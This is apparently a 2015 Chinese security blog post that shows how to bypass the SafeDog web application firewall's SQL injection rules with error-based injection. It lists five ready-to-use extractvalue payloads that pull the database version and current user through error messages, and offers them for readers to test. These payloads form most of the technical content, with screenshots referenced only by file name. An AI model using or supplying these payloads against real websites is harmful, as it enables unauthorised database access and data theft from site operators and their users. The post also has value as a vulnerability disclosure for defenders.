Bypass网站安全狗最新防护规则(SQL报错注射技巧)之二


Aug 24 2015

Bypass网站安全狗最新防护规则(SQL报错注射技巧)之二

首页 » 漏洞收集 » Bypass网站安全狗最新防护规则(SQL报错注射技巧)之二   

简要描述:

放暑假:)

绕过最新网站安全狗sql注入防护规则#2

详细说明:


利用的是updatexml函数,然而这次用extractvalue函数进行报错注入的话也同样可以绕过:)

漏洞证明:

测试环境:



windows server2003 & 最新网站安全狗(APACHE)3.1.09924 网马库更新时间2015-06-05



同样随便找一个可报注入的程序~


killsafedog.jpg


防护日志:

killsafedog2.jpg

发几个供你们测试的payload:

code 区域

extractvalue(rand(0),concat(0x0a,version()))

extractvalue(floor(0),concat(0x0a,version()))

extractvalue(rand(0),concat(0x0a,unhex(hex(user()))))

extractvalue(floor(0),concat(0x0a,unhex(hex(user()))))

extractvalue(rand(0),convert(user() using latin1))

如果您喜欢本博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容:

正文部分到此结束

文章标签: 安全狗漏洞 绕过安全狗 安全狗

版权声明:若无特殊注明,本文皆为( mOon )原创,转载请保留文章出处。

也许喜欢: «ecshop一处验证码绕过逻辑漏洞 | 网站安全狗WebShell上传拦截Bypass»

你肿么看?

你还可以输入 250/250 个字

 微笑 大笑 拽 大哭 亲亲 流汗 喷血 奸笑 囧 不爽 晕 示爱 害羞 吃惊 惊叹 爱你 吓死了 呵呵

评论信息框

这篇文章还没有收到评论,赶紧来抢沙发吧~